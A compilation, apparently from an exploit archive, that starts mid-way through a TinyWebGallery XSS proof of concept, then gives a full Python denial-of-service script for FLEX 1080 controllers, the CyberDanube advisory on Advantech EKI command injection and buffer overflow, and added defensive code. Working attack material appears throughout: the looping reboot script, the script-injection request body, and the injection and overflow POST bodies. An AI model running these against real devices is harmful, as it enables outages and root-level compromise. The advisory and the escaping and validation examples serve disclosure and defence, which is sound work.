User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save


5. Go to http://localhost/twg25/index.php


</code></pre>
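Both XSS advisories above (RockMongo and TinyWebGallery) come down to where encoding happens. The TinyWebGallery request is the instructive one: the folder name arrives already entity-encoded (`%26lt%3Bscript%26gt%3B`, i.e. `&lt;script&gt;`), which an input-side filter that looks for literal `<script>` would wave through; the application later decodes entities and writes the result into the page raw. RockMongo's `format=%27+onMouseOver%3D%27...` lands inside a quoted attribute, where only quote-aware escaping helps. The example below is added here and is not code from either project: it reproduces the decode-then-render sequence as a vulnerable renderer, then shows the fix, escaping at the output boundary with `html.escape(..., quote=True)` regardless of what input processing did. The request body is constructed from the advisory's PoC; the function names are illustrative.

```python
"""Stored/reflected XSS: input-side decoding versus output-side escaping.
Added example; not code from RockMongo or TinyWebGallery."""
import html
from urllib.parse import parse_qs

# Constructed from the TinyWebGallery PoC body above: the folder name is sent
# entity-encoded, so a naive "<script>" check on the raw input sees nothing.
BODY = ("twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B"
        "&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save")


def folder_name_from_body(body):
    """URL-decode the form body and pull out the stored folder name."""
    return parse_qs(body)["twg_foldername"][0]


def vulnerable_render(stored_folder_name):
    """What the advisory describes: entities are decoded at some point after
    storage and the result is interpolated into HTML unescaped."""
    decoded = html.unescape(stored_folder_name)
    return f"<h2>{decoded}</h2>"


def safe_render(stored_folder_name):
    """Same decoding step (it may be needed for legacy data), but the value is
    escaped at the output boundary, so markup in it becomes inert text."""
    decoded = html.unescape(stored_folder_name)
    return f"<h2>{html.escape(decoded, quote=True)}</h2>"


def safe_attribute(value):
    """RockMongo-style reflection into an attribute value. quote=True turns
    both ' and \" into entities, so the attribute cannot be closed early."""
    return f'<input name="format" value="{html.escape(value, quote=True)}">'


def contains_script_tag(markup):
    """Crude check used only to show which renderer leaks a live tag."""
    return "<script>" in markup.lower()


if __name__ == "__main__":
    name = folder_name_from_body(BODY)
    print("stored value:", name)
    print("vulnerable:", vulnerable_render(name))
    print("safe:      ", safe_render(name))
    print("attribute: ", safe_attribute("' onMouseOver='alert(1);"))
```

The general rule this demonstrates: validate and normalise on input if you like, but treat every interpolation point as its own context (HTML body, attribute, JavaScript, URL) and encode for that context at the moment of output. A Content-Security-Policy without `unsafe-inline` is the second layer; it would have stopped both advisories' `alert(1)` payloads from running even with the encoding bug present.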
<pre><code># Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591
#!/usr/bin/env python3
import requests
import re
import argparse
from colorama import Fore
import time


def main():
    def banner():
        print('''
 ________ _______ __
 / ____/ / / ____/ |/ /
 / /_ / / / __/ | /
 / __/ / /___/ /___ / |
 /_/ /_____/_____//_/|_|

[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]

''')

    def reboot():
        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
        if 'Rebooting' in r.text:
            pass
        else:
            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável')
            quit()

    banner()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
    while True:
        try:
            reboot()
            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!')
            time.sleep(1)
        except:
            # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo')
            pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', action='store', help='Target',
                        dest='target', required=True)
    arguments = parser.parse_args()
    try:
        main()
    except KeyError:
        quit()


</code></pre>
<pre><code>CyberDanube Security Research 20230511-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series<br /> vulnerable version| 1.21<br /> fixed version| 1.24<br /> CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575<br /> impact| High<br /> homepage| https://advantech.com<br /> found| 2023-03-06<br /> by| S. Dietz, T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Advantech’s corporate vision is to enable an intelligent planet. The company<br />is a global leader in the fields of IoT intelligent systems and embedded<br />platforms. To embrace the trends of IoT, big data, and artificial intelligence,<br />Advantech promotes IoT hardware and software solutions with the Edge<br />Intelligence WISE-PaaS core to assist business partners and clients in<br />connecting their industrial chains. 
Advantech is also working with business<br />partners to co-create business ecosystems that accelerate the goal of<br />industrial intelligence."<br /><br />Source: https://www.advantech.com/en/about<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />EKI-1524-CE series / 1.21<br />EKI-1522-CE series / 1.21<br />EKI-1521-CE series / 1.21<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)<br />The web server of the device is prone to two authenticated command injections.<br />These allow an attacker to gain full access to the underlying operating system<br />of the device. This device class can be attached to legacy systems via RS-232,<br />RS-422 or RS-485. Such peripheral systems can be affected by attacks to the<br />device from malicious actors.<br /><br />2) Buffer Overflow (CVE-2023-2575)<br />The web server is prone to a buffer overflow, triggered due to missing input<br />lenght validation in the NTP input field. According to the vendor, the NTP<br />server string is expected to be 64 bytes long, which is not correctly checked.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server is prone to two authenticated command injections via POST<br />parameters. 
The following proof-of-concepts show how to inject commands into the<br />system; they are executed with root permissions in the background:<br /><br />1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)<br />The following POST request executes the command “;ping 10.0.0.1” on the system:<br />===============================================================================<br />POST /cgi-bin/index.cgi?func=setsys HTTP/1.1<br />Host: 172.16.0.100<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 541<br />Origin: http://172.16.0.100<br />Connection: close<br />Referer: http://172.16.0.100/cgi-bin/index.cgi<br /><br />web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80<br /><br />===============================================================================<br />It is also possible to execute this command without any interceptor proxy by<br />enclosing it with ";", which results in the string “;ping 10.0.0.1;”.<br /><br />1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)<br />The device name can also be abused for command injection. The injected command<br />is only executed on reboot, but a reboot can also be triggered via the device’s<br />web interface. A POST
A POST<br />request which injects the command “;ls /etc;” can be looks like the following:<br />===============================================================================<br />POST /cgi-bin/index.cgi?func=setsys HTTP/1.1<br />Host: 172.16.0.100<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 541<br />Origin: http://172.16.0.100<br />Connection: close<br />Referer: http://172.16.0.100/cgi-bin/index.cgi<br /><br />web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80<br /><br />===============================================================================<br />Such command can also be injected by setting the device name to “;ls /etc;”.<br /><br /><br />2) Buffer Overflow (CVE-2023-2575)<br />The following POST request can be used to trigger a buffer overflow<br />vulnerability in the web server:<br />===============================================================================<br />POST /cgi-bin/index.cgi?func=setsys HTTP/1.1<br />Host: 172.16.0.97<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 823<br />Origin: http://172.16.0.97<br />Connection: close<br />Referer: 
http://172.16.0.97/cgi-bin/index.cgi<br /><br />web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80<br />===============================================================================<br /><br />The serial port of the device provides error messages, which already indicate<br />that the stack has been corrupted:<br />/ # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 ***<br />*** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 ***<br /><br />Furthermore, the forked child processes seem to remain in the process list as<br />zombies - three buffer overflows were triggered in this case:<br />/ # ps<br />PID USER COMMAND<br />[...]<br /> 935 root ./index.cgi func=setsys<br /> 959 root ./index.cgi func=setsys<br /> 983 root ./index.cgi func=setsys<br />[...]<br /><br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update the product to the latest available firmware version.<br /><br /><br />Workaround<br 
/>-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends that Advantech customers upgrade the firmware to the<br />latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2023-03-08: Contacting Advantech via Service Request form; No answer.<br />2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);<br /> Vendor confirmed vulnerabilities and will provide a fixed firmware<br /> by 2023-05-13. Asked vendor for affected models; Vendor<br /> responded that EKI-1524/1522/1521 series are affected.<br />2023-03-20: Asked for status update.<br />2023-03-21: Vendor responded that the firmware is currently under testing.<br />2023-03-31: Vendor stated that the firmware is done and sent it via email; Found<br /> additional issues and responded to vendor.<br />2023-04-01: Vendor asked multiple questions.<br />2023-04-02: Responded to vendor, answered questions and asked for a call;<br /> Vendor agreed.<br />2023-04-04: Set date for a call to 2023-04-10.<br />2023-04-10: Clarified further issues.<br />2023-04-23: Vendor sent notification that a beta release of the firmware is<br /> available.<br />2023-05-02: Vendor sent notification that a new firmware release is online.<br />2023-05-04: Asked vendor if the advisory can be published earlier than agreed.<br />2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities<br /> have been fixed.<br />2023-05-11: Coordinated release of security advisory.<br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF S. Dietz, T. Weber / @2023<br /><br /><br /></code></pre>
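A defender-side check for the setsys parameters that the three findings above abuse, added here as an example; it is not part of the CyberDanube advisory or of Advantech's firmware. It parses a form body to index.cgi?func=setsys the way a hardened CGI or a WAF rule would, flags shell metacharacters in ntp_name and sys_name (the two command injections), and flags an NTP server string longer than the vendor-stated 64 bytes (the overflow). The hostname grammar, the metacharacter set and the sample bodies (shortened from the PoC requests) are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

NTP_MAX_LEN = 64  # vendor-stated size of the NTP server string (advisory, item 2)
SHELL_META = set(";|&`$()<>\n\r\"'\\")  # characters a shell interprets; the PoCs rely on ';'
# RFC 1123 style hostname or dotted IPv4: labels of 1-63 chars, 253 total, no leading/trailing '-'
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

def parse_form(body: str) -> dict[str, list[str]]:
    """Minimal x-www-form-urlencoded parser: splits on '&' only, so ';' stays inside values."""
    params: dict[str, list[str]] = {}
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(raw))
    return params

def check_setsys_body(body: str) -> list[tuple[str, str]]:
    """Return (field, reason) findings for one setsys body; an empty list means it looks benign."""
    params = parse_form(body)
    findings = []
    for field in ("ntp_name", "sys_name"):
        for value in params.get(field, []):
            if SHELL_META & set(value):  # ';ping 10.0.0.1;' and ';ls /etc;' both trip this
                findings.append((field, "shell-metachar"))
            if field == "ntp_name":
                if len(value.encode()) > NTP_MAX_LEN:  # the overflow PoC sends several hundred bytes
                    findings.append((field, "too-long"))
                if value and not HOSTNAME_RE.match(value):  # an empty NTP field is left alone
                    findings.append((field, "not-a-hostname"))
    return findings

def scan_requests(requests: list[tuple[str, str]]) -> list[tuple[int, list[tuple[str, str]]]]:
    """Run the check over (request_line, body) pairs; only POSTs to index.cgi?func=setsys are inspected."""
    hits = []
    for idx, (request_line, body) in enumerate(requests):
        if request_line.startswith("POST ") and "/cgi-bin/index.cgi?func=setsys" in request_line:
            findings = check_setsys_body(body)
            if findings:
                hits.append((idx, findings))
    return hits

# Constructed sample requests, shortened from the advisory's PoC bodies.
SETSYS = "POST /cgi-bin/index.cgi?func=setsys HTTP/1.1"
SAMPLES = [
    (SETSYS, "web_en=1&sys_name=test&ntp_name=pool.ntp.org&tz=UTC12%3A0"),  # benign
    (SETSYS, "web_en=1&sys_name=test&ntp_name=;ping+10.0.0.1;&tz=UTC12%3A0"),  # CVE-2023-2573 shape
    (SETSYS, "web_en=1&sys_name=;ls+/etc;&ntp_name=&tz=UTC12%3A0"),  # CVE-2023-2574 shape
    (SETSYS, "web_en=1&sys_name=test&ntp_name=" + "a" * 300 + "&tz=UTC12%3A0"),  # CVE-2023-2575 shape
]
```

Running scan_requests(SAMPLES) flags requests 1, 2 and 3 and leaves the benign one alone; the same checks, applied server-side before the value reaches a shell or a fixed-size buffer, are what the fixed firmware needs to enforce.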